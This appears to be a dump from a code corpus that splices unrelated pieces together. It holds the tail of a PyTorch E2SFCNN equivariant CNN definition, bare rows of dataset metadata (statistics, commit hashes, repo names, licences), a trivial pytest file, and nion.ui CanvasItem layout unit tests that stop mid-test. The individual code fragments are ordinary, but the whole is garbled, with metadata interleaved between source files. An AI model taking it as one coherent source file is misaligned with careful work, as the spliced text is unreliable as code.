        :param fix_param: rescale channel counts to keep the parameter count roughly constant across groups
        :param fco: frequency cutoff; multiplied by pi when positive
        :param p_drop_fully: dropout probability in the fully-connected head
        :param J: ``maximum_offset`` passed to R2Conv
        :param sigma: radial basis width passed to R2Conv
        :param sgsize: size of the restriction subgroup (defaults to N)
        :param flip: include reflections in the base group
        """
        super(E2SFCNN, self).__init__()
        if N is None:
            N = 16
        # NOTE(review): this assert makes the `elif N == 1` branch below unreachable — confirm intended
        assert N > 1
        self.n_channels = n_channels
        self.n_classes = n_classes
        # build the group O(2) or D_N depending on the number N of rotations specified
        if N > 1:
            self.gspace = FlipRot2dOnR2(N)
        elif N == 1:
            self.gspace = Flip2dOnR2()
        else:
            raise ValueError(N)
        # if flips are not required, immediately restrict to the SO(2) or C_N subgroup
        if not flip:
            if N != 1:
                sg = (None, N)
            else:
                sg = 1
            self.gspace, _, _ = self.gspace.restrict(sg)
        # id of the subgroup if group restriction is applied through the network
        if sgsize is not None:
            self.sgid = sgsize
        else:
            self.sgid = N
        if flip and N != 1:
            self.sgid = (None, self.sgid)
        if fco is not None and fco > 0.:
            fco *= np.pi
        frequencies_cutoff = fco
        eq_layers = []
        LAYER = 0

        # Builds one conv block: R2Conv -> (restriction + disentangle) -> batchnorm
        # -> (group pooling) -> (max pooling) -> ELU.
        # NOTE: reads LAYER / restrict / fix_param / sigma / J from the enclosing
        # scope via closure, so `restrict == LAYER` is evaluated at call time.
        # NOTE(review): "orientantion_pooling" is a typo for "orientation_pooling"
        # (local-only name, not part of the public interface).
        def build_layers(r1: FieldType, C: int, s: int, padding: int = 0, pooling: int = None, orientantion_pooling: bool = False):
            gspace = r1.gspace
            if fix_param:
                # to keep number of parameters more or less constant when changing groups
                # (more precisely, we try to keep them close to the number of parameters in the original SFCNN)
                C /= np.sqrt(gspace.fibergroup.order()/16)
            C = int(C)
            layers = []
            r2 = FieldType(gspace, [gspace.representations['regular']] * C)
            cl = R2Conv(r1, r2, s,
                        frequencies_cutoff=frequencies_cutoff,
                        padding=padding,
                        sigma=sigma,
                        maximum_offset=J)
            layers.append(cl)
            if restrict == LAYER:
                layers.append(RestrictionModule(layers[-1].out_type, self.sgid))
                layers.append(DisentangleModule(layers[-1].out_type))
            bn = InnerBatchNorm(layers[-1].out_type)
            layers.append(bn)
            if orientantion_pooling:
                pl = GroupPooling(layers[-1].out_type)
                layers.append(pl)
            if pooling is not None:
                pl = PointwiseMaxPool(layers[-1].out_type, pooling)
                layers.append(pl)
            nnl = ELU(layers[-1].out_type, inplace=True)
            layers.append(nnl)
            return layers

        # restriction before the first layer is applied to the gspace itself
        if restrict == LAYER:
            self.gspace, _, _ = self.gspace.restrict(self.sgid)
        r1 = FieldType(self.gspace, [self.gspace.trivial_repr] * n_channels)
        # 28 px
        # Convolutional Layer 1
        LAYER += 1
        #TODO no padding here? with such a large filter???
        eq_layers += build_layers(r1, 24, 9, 0, None)
        # Convolutional Layer 2
        LAYER += 1
        eq_layers += build_layers(eq_layers[-1].out_type, 32, 7, 3, 2)
        # TODO this number is right iff we used padding in the first layer!
        # 14 px
        # Convolutional Layer 3
        LAYER += 1
        eq_layers += build_layers(eq_layers[-1].out_type, 36, 7, 3, None)
        # Convolutional Layer 4
        LAYER += 1
        eq_layers += build_layers(eq_layers[-1].out_type, 36, 7, 3, 2)
        # 7 px
        # Convolutional Layer 5
        LAYER += 1
        eq_layers += build_layers(eq_layers[-1].out_type, 64, 7, 3)
        # Convolutional Layer 6 (pools over orientations)
        LAYER += 1
        eq_layers += build_layers(eq_layers[-1].out_type, 96, 5, 0, None, True)
        # Adaptive Pooling
        mpl = PointwiseAdaptiveMaxPool(eq_layers[-1].out_type, 1)
        eq_layers.append(mpl)
        # 1 px
        # c = 96
        c = eq_layers[-1].out_type.size
        self.in_repr = eq_layers[0].in_type
        self.eq_layers = torch.nn.ModuleList(eq_layers)
        # Fully Connected
        self.fully_net = nn.Sequential(
            nn.Dropout(p=p_drop_fully),
            nn.Linear(c, 96),
            nn.BatchNorm1d(96),
            nn.ELU(inplace=True),
            nn.Dropout(p=p_drop_fully),
            nn.Linear(96, 96),
            nn.BatchNorm1d(96),
            nn.ELU(inplace=True),
            nn.Dropout(p=p_drop_fully),
            nn.Linear(96, n_classes),
        )

    def forward(self, input: torch.Tensor):
        """Classify a batch of images; returns (B, n_classes) scores."""
        x = GeometricTensor(input, self.in_repr)
        for layer in self.eq_layers:
            x = layer(x)
        x = self.fully_net(x.tensor.reshape(x.tensor.shape[0], -1))
        return x
| 31.134211
| 131
| 0.514327
| 1,424
| 11,831
| 4.13764
| 0.135534
| 0.051595
| 0.044128
| 0.061779
| 0.811779
| 0.765275
| 0.760692
| 0.729124
| 0.704684
| 0.681263
| 0
| 0.034226
| 0.387541
| 11,831
| 380
| 132
| 31.134211
| 0.778913
| 0.10912
| 0
| 0.692623
| 0
| 0
| 0.000667
| 0
| 0
| 0
| 0
| 0.002632
| 0.012295
| 1
| 0.028689
| false
| 0
| 0.020492
| 0
| 0.077869
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
2a30128b8d5360e095d62eba30b00b05ac74908e
| 58
|
py
|
Python
|
test/test_app.py
|
elliottmurray/python_sdk
|
d7df240af054243756a10fbb895225c0e4c4fd99
|
[
"MIT"
] | null | null | null |
test/test_app.py
|
elliottmurray/python_sdk
|
d7df240af054243756a10fbb895225c0e4c4fd99
|
[
"MIT"
] | null | null | null |
test/test_app.py
|
elliottmurray/python_sdk
|
d7df240af054243756a10fbb895225c0e4c4fd99
|
[
"MIT"
] | null | null | null |
import pytest
def test_answer():
    """Sanity check that the test harness runs at all."""
    assert True
| 11.6
| 23
| 0.689655
| 8
| 58
| 4.875
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.224138
| 58
| 4
| 24
| 14.5
| 0.866667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
2a35e7da8fdec935ebecf3342dfe62cfac29e4bd
| 107,022
|
py
|
Python
|
nion/ui/test/CanvasItem_test.py
|
AEljarrat/nionui
|
3714a54d56f472a8a0f7b9f8a8240103ca790374
|
[
"Apache-2.0"
] | null | null | null |
nion/ui/test/CanvasItem_test.py
|
AEljarrat/nionui
|
3714a54d56f472a8a0f7b9f8a8240103ca790374
|
[
"Apache-2.0"
] | null | null | null |
nion/ui/test/CanvasItem_test.py
|
AEljarrat/nionui
|
3714a54d56f472a8a0f7b9f8a8240103ca790374
|
[
"Apache-2.0"
] | null | null | null |
# standard libraries
import contextlib
import logging
import time
import unittest
# third party libraries
# None
# local libraries
from nion.ui import CanvasItem
from nion.ui import DrawingContext
from nion.ui import TestUI
from nion.utils import Geometry
class TestCanvasItem(CanvasItem.AbstractCanvasItem):
    """Canvas item that records mouse and keyboard events for the tests below."""

    def __init__(self):
        super().__init__()
        self.key = None
        self._mouse_released = False
        self.wants_mouse_events = True

    def mouse_pressed(self, x, y, modifiers):
        # claim the press so the subsequent drag is delivered to this item
        return True

    def mouse_released(self, x, y, modifiers):
        self._mouse_released = True

    def key_pressed(self, key):
        self.key = key

    def key_released(self, key):
        self.key_r = key
class TestCanvasItemClass(unittest.TestCase):
    def setUp(self):
        # disable threaded rendering so each test behaves deterministically
        CanvasItem._threaded_rendering_enabled = False
    def tearDown(self):
        # nothing to clean up
        pass
def simulate_drag(self, canvas_widget, p1, p2, modifiers=None):
modifiers = CanvasItem.KeyboardModifiers() if not modifiers else modifiers
canvas_widget.on_mouse_pressed(p1[1], p1[0], modifiers)
canvas_widget.on_mouse_position_changed(p1[1], p1[0], modifiers)
midp = Geometry.midpoint(p1, p2)
canvas_widget.on_mouse_position_changed(midp[1], midp[0], modifiers)
canvas_widget.on_mouse_position_changed(p2[1], p2[0], modifiers)
canvas_widget.on_mouse_released(p2[1], p2[0], modifiers)
def test_drag_inside_bounds(self):
ui = TestUI.UserInterface()
canvas_widget = ui.create_canvas_widget()
with contextlib.closing(canvas_widget):
canvas_item = TestCanvasItem()
canvas_widget.canvas_item.add_canvas_item(canvas_item)
canvas_widget.canvas_item.layout_immediate((100, 100))
self.simulate_drag(canvas_widget, (50, 50), (30, 50))
self.assertTrue(canvas_item._mouse_released)
def test_drag_outside_bounds(self):
ui = TestUI.UserInterface()
canvas_widget = ui.create_canvas_widget()
with contextlib.closing(canvas_widget):
canvas_item = TestCanvasItem()
canvas_widget.canvas_item.add_canvas_item(canvas_item)
canvas_widget.canvas_item.layout_immediate((100, 100))
self.simulate_drag(canvas_widget, (50, 50), (-30, 50))
self.assertTrue(canvas_item._mouse_released)
def test_drag_within_composition(self):
ui = TestUI.UserInterface()
canvas_widget = ui.create_canvas_widget()
with contextlib.closing(canvas_widget):
canvas_item = TestCanvasItem()
container = CanvasItem.CanvasItemComposition()
container.add_canvas_item(canvas_item)
canvas_widget.canvas_item.add_canvas_item(container)
canvas_widget.canvas_item.layout_immediate((100, 100))
self.simulate_drag(canvas_widget, (50, 50), (30, 50))
self.assertTrue(canvas_item._mouse_released)
def test_drag_within_composition_but_outside_bounds(self):
ui = TestUI.UserInterface()
canvas_widget = ui.create_canvas_widget()
with contextlib.closing(canvas_widget):
canvas_item = TestCanvasItem()
container = CanvasItem.CanvasItemComposition()
container.add_canvas_item(canvas_item)
canvas_widget.canvas_item.add_canvas_item(container)
canvas_widget.canvas_item.layout_immediate((100, 100))
self.simulate_drag(canvas_widget, (50, 50), (-30, 50))
self.assertTrue(canvas_item._mouse_released)
def test_layout_uses_minimum_aspect_ratio(self):
# test row layout
canvas_item = CanvasItem.CanvasItemComposition()
canvas_item.layout = CanvasItem.CanvasItemRowLayout()
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#F00"))
canvas_item.canvas_items[0].sizing.minimum_aspect_ratio = 2.0
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
self.assertEqual(canvas_item.canvas_items[0].canvas_origin, Geometry.IntPoint(x=0, y=80))
self.assertEqual(canvas_item.canvas_items[0].canvas_size, Geometry.IntSize(width=640, height=320))
def test_layout_uses_maximum_aspect_ratio(self):
# test row layout
canvas_item = CanvasItem.CanvasItemComposition()
canvas_item.layout = CanvasItem.CanvasItemRowLayout()
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#F00"))
canvas_item.canvas_items[0].sizing.maximum_aspect_ratio = 1.0
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
self.assertEqual(canvas_item.canvas_items[0].canvas_origin, Geometry.IntPoint(x=80, y=0))
self.assertEqual(canvas_item.canvas_items[0].canvas_size, Geometry.IntSize(width=480, height=480))
def test_composition_layout_uses_preferred_aspect_ratio(self):
# test row layout
canvas_item = CanvasItem.CanvasItemComposition()
canvas_item.layout = CanvasItem.CanvasItemRowLayout()
child_canvas = CanvasItem.CanvasItemComposition()
child_canvas.add_canvas_item(CanvasItem.BackgroundCanvasItem("#F00"))
canvas_item.add_canvas_item(child_canvas)
child_canvas.sizing.preferred_aspect_ratio = 1.0
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
self.assertEqual(canvas_item.canvas_items[0].canvas_origin, Geometry.IntPoint(x=80, y=0))
self.assertEqual(canvas_item.canvas_items[0].canvas_size, Geometry.IntSize(width=480, height=480))
def test_composition_layout_sizing_includes_margins_but_not_spacing(self):
# test row layout
canvas_item = CanvasItem.CanvasItemComposition()
canvas_item.layout.margins = Geometry.Margins(top=4, bottom=6, left=8, right=10)
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#F00"))
canvas_item.canvas_items[0].sizing.minimum_width = 16
canvas_item.canvas_items[0].sizing.maximum_height = 24
self.assertEqual(canvas_item.layout_sizing.minimum_width, 16 + 8 + 10)
self.assertEqual(canvas_item.layout_sizing.maximum_height, 24 + 4 + 6)
def test_row_layout_sizing_includes_margins_and_spacing(self):
# test row layout
canvas_item = CanvasItem.CanvasItemComposition()
canvas_item.layout = CanvasItem.CanvasItemRowLayout(spacing=7, margins=Geometry.Margins(top=4, bottom=6, left=8, right=10))
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#F00"))
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#0F0"))
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#00F"))
canvas_item.canvas_items[0].sizing.minimum_width = 16
canvas_item.canvas_items[0].sizing.maximum_height = 12
canvas_item.canvas_items[1].sizing.minimum_width = 32
canvas_item.canvas_items[1].sizing.maximum_height = 24
canvas_item.canvas_items[2].sizing.minimum_width = 48
canvas_item.canvas_items[2].sizing.maximum_height = 36
self.assertEqual(canvas_item.layout_sizing.minimum_width, 16 + 32 + 48 + 2 * 7 + 8 + 10) # includes margins and spacing
self.assertEqual(canvas_item.layout_sizing.maximum_height, 36 + 4 + 6) # includes margins only
def test_column_layout_sizing_includes_margins_and_spacing(self):
# test row layout
canvas_item = CanvasItem.CanvasItemComposition()
canvas_item.layout = CanvasItem.CanvasItemColumnLayout(spacing=7, margins=Geometry.Margins(top=4, bottom=6, left=8, right=10))
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#F00"))
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#0F0"))
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#00F"))
canvas_item.canvas_items[0].sizing.minimum_width = 16
canvas_item.canvas_items[0].sizing.maximum_height = 12
canvas_item.canvas_items[1].sizing.minimum_width = 32
canvas_item.canvas_items[1].sizing.maximum_height = 24
canvas_item.canvas_items[2].sizing.minimum_width = 48
canvas_item.canvas_items[2].sizing.maximum_height = 36
self.assertEqual(canvas_item.layout_sizing.minimum_width, 48 + 8 + 10) # includes margins only
self.assertEqual(canvas_item.layout_sizing.maximum_height, 12 + 24 + 36 + 2 * 7 + 4 + 6) # includes margins and spacing
def test_grid_layout_sizing_includes_margins_and_spacing(self):
# test row layout
canvas_item = CanvasItem.CanvasItemComposition()
canvas_item.layout = CanvasItem.CanvasItemGridLayout(Geometry.IntSize(2, 2), spacing=7, margins=Geometry.Margins(top=4, bottom=6, left=8, right=10))
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#F00"), Geometry.IntPoint(x=0, y=0))
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#0F0"), Geometry.IntPoint(x=1, y=0))
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#00F"), Geometry.IntPoint(x=0, y=1))
#canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#888"), Geometry.IntPoint(x=1, y=1))
canvas_item.canvas_items[0].sizing.minimum_width = 16
canvas_item.canvas_items[0].sizing.maximum_height = 12
canvas_item.canvas_items[1].sizing.minimum_width = 32
canvas_item.canvas_items[1].sizing.maximum_height = 24
canvas_item.canvas_items[2].sizing.minimum_width = 48
canvas_item.canvas_items[2].sizing.maximum_height = 36
self.assertEqual(canvas_item.layout_sizing.minimum_width, 32 + 48 + 1 * 7 + 8 + 10) # includes margins only
self.assertEqual(canvas_item.layout_sizing.maximum_height, 24 + 36 + 1 * 7 + 4 + 6) # includes margins and spacing
def test_layout_splits_evening_between_two_items(self):
# test row layout
canvas_item = CanvasItem.CanvasItemComposition()
canvas_item.layout = CanvasItem.CanvasItemRowLayout()
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#F00"))
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#0F0"))
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
self.assertEqual(canvas_item.canvas_items[0].canvas_origin, Geometry.IntPoint(x=0, y=0))
self.assertEqual(canvas_item.canvas_items[0].canvas_size, Geometry.IntSize(width=320, height=480))
self.assertEqual(canvas_item.canvas_items[1].canvas_origin, Geometry.IntPoint(x=320, y=0))
self.assertEqual(canvas_item.canvas_items[1].canvas_size, Geometry.IntSize(width=320, height=480))
# test column layout
canvas_item = CanvasItem.CanvasItemComposition()
canvas_item.layout = CanvasItem.CanvasItemColumnLayout()
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#F00"))
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#0F0"))
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
self.assertEqual(canvas_item.canvas_items[0].canvas_origin, Geometry.IntPoint(x=0, y=0))
self.assertEqual(canvas_item.canvas_items[0].canvas_size, Geometry.IntSize(width=640, height=240))
self.assertEqual(canvas_item.canvas_items[1].canvas_origin, Geometry.IntPoint(x=0, y=240))
self.assertEqual(canvas_item.canvas_items[1].canvas_size, Geometry.IntSize(width=640, height=240))
def test_layout_splits_evening_between_three_items_with_spacing_and_margins(self):
# test row layout
canvas_item = CanvasItem.CanvasItemComposition()
canvas_item.layout = CanvasItem.CanvasItemRowLayout(spacing=10, margins=Geometry.Margins(top=3, left=5, bottom=7, right=11))
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#F00"))
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#0F0"))
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#00F"))
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
self.assertEqual(canvas_item.canvas_items[0].canvas_origin, Geometry.IntPoint(x=5, y=3))
self.assertEqual(canvas_item.canvas_items[0].canvas_size, Geometry.IntSize(width=201, height=470))
self.assertEqual(canvas_item.canvas_items[1].canvas_origin, Geometry.IntPoint(x=216, y=3))
self.assertEqual(canvas_item.canvas_items[1].canvas_size, Geometry.IntSize(width=201, height=470))
self.assertEqual(canvas_item.canvas_items[2].canvas_origin, Geometry.IntPoint(x=427, y=3))
self.assertEqual(canvas_item.canvas_items[2].canvas_size, Geometry.IntSize(width=202, height=470))
# test column layout
canvas_item = CanvasItem.CanvasItemComposition()
canvas_item.layout = CanvasItem.CanvasItemColumnLayout(spacing=10, margins=Geometry.Margins(top=3, left=5, bottom=7, right=11))
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#F00"))
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#0F0"))
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#00F"))
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
self.assertEqual(canvas_item.canvas_items[0].canvas_origin, Geometry.IntPoint(x=5, y=3))
self.assertEqual(canvas_item.canvas_items[0].canvas_size, Geometry.IntSize(width=624, height=150))
self.assertEqual(canvas_item.canvas_items[1].canvas_origin, Geometry.IntPoint(x=5, y=163))
self.assertEqual(canvas_item.canvas_items[1].canvas_size, Geometry.IntSize(width=624, height=150))
self.assertEqual(canvas_item.canvas_items[2].canvas_origin, Geometry.IntPoint(x=5, y=323))
self.assertEqual(canvas_item.canvas_items[2].canvas_size, Geometry.IntSize(width=624, height=150))
def test_layout_splits_two_with_first_one_minimum_size(self):
# test row layout
canvas_item = CanvasItem.CanvasItemComposition()
canvas_item.layout = CanvasItem.CanvasItemRowLayout()
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#F00"))
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#0F0"))
canvas_item.canvas_items[0].sizing.minimum_width = 500
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
self.assertEqual(canvas_item.canvas_items[0].canvas_origin, Geometry.IntPoint(x=0, y=0))
self.assertEqual(canvas_item.canvas_items[0].canvas_size, Geometry.IntSize(width=500, height=480))
self.assertEqual(canvas_item.canvas_items[1].canvas_origin, Geometry.IntPoint(x=500, y=0))
self.assertEqual(canvas_item.canvas_items[1].canvas_size, Geometry.IntSize(width=140, height=480))
# test column layout
canvas_item = CanvasItem.CanvasItemComposition()
canvas_item.layout = CanvasItem.CanvasItemColumnLayout()
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#F00"))
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#0F0"))
canvas_item.canvas_items[0].sizing.minimum_height = 300
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
self.assertEqual(canvas_item.canvas_items[0].canvas_origin, Geometry.IntPoint(x=0, y=0))
self.assertEqual(canvas_item.canvas_items[0].canvas_size, Geometry.IntSize(width=640, height=300))
self.assertEqual(canvas_item.canvas_items[1].canvas_origin, Geometry.IntPoint(x=0, y=300))
self.assertEqual(canvas_item.canvas_items[1].canvas_size, Geometry.IntSize(width=640, height=180))
def test_layout_splits_two_with_second_one_minimum_size(self):
# test row layout
canvas_item = CanvasItem.CanvasItemComposition()
canvas_item.layout = CanvasItem.CanvasItemRowLayout()
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#F00"))
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#0F0"))
canvas_item.canvas_items[1].sizing.minimum_width = 500
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
self.assertEqual(canvas_item.canvas_items[0].canvas_origin, Geometry.IntPoint(x=0, y=0))
self.assertEqual(canvas_item.canvas_items[0].canvas_size, Geometry.IntSize(width=140, height=480))
self.assertEqual(canvas_item.canvas_items[1].canvas_origin, Geometry.IntPoint(x=140, y=0))
self.assertEqual(canvas_item.canvas_items[1].canvas_size, Geometry.IntSize(width=500, height=480))
# test column layout
canvas_item = CanvasItem.CanvasItemComposition()
canvas_item.layout = CanvasItem.CanvasItemColumnLayout()
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#F00"))
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#0F0"))
canvas_item.canvas_items[1].sizing.minimum_height = 300
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
self.assertEqual(canvas_item.canvas_items[0].canvas_origin, Geometry.IntPoint(x=0, y=0))
self.assertEqual(canvas_item.canvas_items[0].canvas_size, Geometry.IntSize(width=640, height=180))
self.assertEqual(canvas_item.canvas_items[1].canvas_origin, Geometry.IntPoint(x=0, y=180))
self.assertEqual(canvas_item.canvas_items[1].canvas_size, Geometry.IntSize(width=640, height=300))
def test_layout_splits_two_with_first_one_maximum_size(self):
# test row layout
canvas_item = CanvasItem.CanvasItemComposition()
canvas_item.layout = CanvasItem.CanvasItemRowLayout()
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#F00"))
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#0F0"))
canvas_item.canvas_items[0].sizing.maximum_width = 100
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
self.assertEqual(canvas_item.canvas_items[0].canvas_origin, Geometry.IntPoint(x=0, y=0))
self.assertEqual(canvas_item.canvas_items[0].canvas_size, Geometry.IntSize(width=100, height=480))
self.assertEqual(canvas_item.canvas_items[1].canvas_origin, Geometry.IntPoint(x=100, y=0))
self.assertEqual(canvas_item.canvas_items[1].canvas_size, Geometry.IntSize(width=540, height=480))
def test_layout_splits_two_with_second_one_maximum_size(self):
# test row layout
canvas_item = CanvasItem.CanvasItemComposition()
canvas_item.layout = CanvasItem.CanvasItemRowLayout()
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#F00"))
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#0F0"))
canvas_item.canvas_items[1].sizing.maximum_width = 100
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
self.assertEqual(canvas_item.canvas_items[0].canvas_origin, Geometry.IntPoint(x=0, y=0))
self.assertEqual(canvas_item.canvas_items[0].canvas_size, Geometry.IntSize(width=540, height=480))
self.assertEqual(canvas_item.canvas_items[1].canvas_origin, Geometry.IntPoint(x=540, y=0))
self.assertEqual(canvas_item.canvas_items[1].canvas_size, Geometry.IntSize(width=100, height=480))
def disabled_test_layout_splits_three_with_maximum_making_room_for_minimized_item(self):
# this should work, but the particular solver has trouble in this specific case because it reaches
# the minimum value of 230 on the first pass before it processes the maximum value of 100 and it
# should be able to go back and raise the 230 to 270 once it sees it has extra space.
# test row layout
canvas_item = CanvasItem.CanvasItemComposition()
canvas_item.layout = CanvasItem.CanvasItemRowLayout()
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#F00"))
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#0F0"))
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#00F"))
canvas_item.canvas_items[0].sizing.minimum_width = 230
canvas_item.canvas_items[1].sizing.maximum_width = 100
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
for i, child_canvas_item in enumerate(canvas_item.canvas_items):
print("{} {} {}".format(i, child_canvas_item.canvas_origin, child_canvas_item.canvas_size))
self.assertEqual(canvas_item.canvas_items[0].canvas_origin, Geometry.IntPoint(x=0, y=0))
self.assertEqual(canvas_item.canvas_items[0].canvas_size, Geometry.IntSize(width=270, height=480))
self.assertEqual(canvas_item.canvas_items[1].canvas_origin, Geometry.IntPoint(x=270, y=0))
self.assertEqual(canvas_item.canvas_items[1].canvas_size, Geometry.IntSize(width=100, height=480))
self.assertEqual(canvas_item.canvas_items[2].canvas_origin, Geometry.IntPoint(x=370, y=0))
self.assertEqual(canvas_item.canvas_items[2].canvas_size, Geometry.IntSize(width=270, height=480))
def test_column_with_child_with_fixed_size_does_not_expand_child_horizontally(self):
canvas_item = CanvasItem.CanvasItemComposition()
canvas_item.layout = CanvasItem.CanvasItemColumnLayout()
background_canvas_item = CanvasItem.BackgroundCanvasItem("#F00")
background_canvas_item.sizing.set_fixed_size(Geometry.IntSize(height=20, width=30))
canvas_item.add_canvas_item(background_canvas_item)
canvas_item.add_stretch()
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
self.assertEqual(background_canvas_item.canvas_bounds, Geometry.IntRect.from_tlbr(0, 0, 20, 30))
def test_column_with_fixed_size_child_centers_horizontally_by_default(self):
canvas_item = CanvasItem.CanvasItemComposition()
canvas_item.layout = CanvasItem.CanvasItemColumnLayout()
canvas_item.add_stretch()
background_canvas_item = CanvasItem.BackgroundCanvasItem("#F00")
background_canvas_item.sizing.set_fixed_size(Geometry.IntSize(height=20, width=30))
canvas_item.add_canvas_item(background_canvas_item)
canvas_item.add_stretch()
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
self.assertEqual(background_canvas_item.canvas_rect, Geometry.IntRect.from_tlbr(230, 305, 250, 335))
def test_column_with_fixed_size_child_aligns_start(self):
canvas_item = CanvasItem.CanvasItemComposition()
canvas_item.layout = CanvasItem.CanvasItemColumnLayout(alignment="start")
canvas_item.add_stretch()
background_canvas_item = CanvasItem.BackgroundCanvasItem("#F00")
background_canvas_item.sizing.set_fixed_size(Geometry.IntSize(height=20, width=30))
canvas_item.add_canvas_item(background_canvas_item)
canvas_item.add_stretch()
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
self.assertEqual(background_canvas_item.canvas_rect, Geometry.IntRect.from_tlbr(230, 0, 250, 30))
def test_column_with_fixed_size_child_aligns_end(self):
canvas_item = CanvasItem.CanvasItemComposition()
canvas_item.layout = CanvasItem.CanvasItemColumnLayout(alignment="end")
canvas_item.add_stretch()
background_canvas_item = CanvasItem.BackgroundCanvasItem("#F00")
background_canvas_item.sizing.set_fixed_size(Geometry.IntSize(height=20, width=30))
canvas_item.add_canvas_item(background_canvas_item)
canvas_item.add_stretch()
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
self.assertEqual(background_canvas_item.canvas_rect, Geometry.IntRect.from_tlbr(230, 610, 250, 640))
def test_row_with_fixed_size_child_centers_horizontally_by_default(self):
canvas_item = CanvasItem.CanvasItemComposition()
canvas_item.layout = CanvasItem.CanvasItemRowLayout()
canvas_item.add_stretch()
background_canvas_item = CanvasItem.BackgroundCanvasItem("#F00")
background_canvas_item.sizing.set_fixed_size(Geometry.IntSize(height=20, width=30))
canvas_item.add_canvas_item(background_canvas_item)
canvas_item.add_stretch()
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
self.assertEqual(background_canvas_item.canvas_rect, Geometry.IntRect.from_tlbr(230, 305, 250, 335))
def test_row_with_fixed_size_child_aligns_start(self):
canvas_item = CanvasItem.CanvasItemComposition()
canvas_item.layout = CanvasItem.CanvasItemRowLayout(alignment="start")
canvas_item.add_stretch()
background_canvas_item = CanvasItem.BackgroundCanvasItem("#F00")
background_canvas_item.sizing.set_fixed_size(Geometry.IntSize(height=20, width=30))
canvas_item.add_canvas_item(background_canvas_item)
canvas_item.add_stretch()
